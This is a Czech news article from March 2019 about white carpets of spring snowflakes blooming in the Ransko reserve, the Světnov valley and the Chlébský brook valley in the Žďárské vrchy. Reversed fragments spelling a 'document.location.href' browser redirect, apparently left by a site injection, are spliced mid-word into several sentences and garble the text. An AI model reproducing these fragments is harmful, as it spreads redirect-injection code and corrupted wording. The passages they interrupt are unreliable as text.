Rainbow page separator

Ve Žďárských vrších vypukla sezona rozkvetlých bledulí jarních

Neděle, 24. března 2019

Žďársko / Bílé koberce tisíců bledulí jarních v plném květu mohou nyní lidé obdivovat v lese mezi Novým a Starým Ranskem v
Národní přírodní rezervaci Ransko na území Chráněné krajinné oblasti (CHKO) Žďárské vrchy. Ransko je jednou ze čtyř národních přírodních rezervací Žďárských vrchů. Bledule ros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou na vlhkých pozemcích ve střední části rezervace pod jasany a olšemi. Křehké jarní kvítky se objevují už na hrázi rybníka Pobočný a pokračují hlouběji do lesa. Vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že se jedná o přírodní rezervaci, je zakázáno chráněné květy nejenom trhat, ale také chodit mimo vyznačené cesty, aby nedošlo k poničení porostu.
Rozkvetlé bledule jsou aktuálně k vidění rovněž ve Světnovském údolí. Přírodní památka se nachází zhruba kilometr severovýchodně od obce Světnov na Žďársku. Doba kve[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toucích bledulí se ve žďárském okrese naopak chýlí ke konci v přírodní rezervaci Údolí Chlébského po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toka u Chlébského, místní části obce Skorotice na Bystřicku. Tam statisíce bílých květů každoročně rozkvétá jako první a se začátkem jara přitahují davy návštěvníků z celé republiky.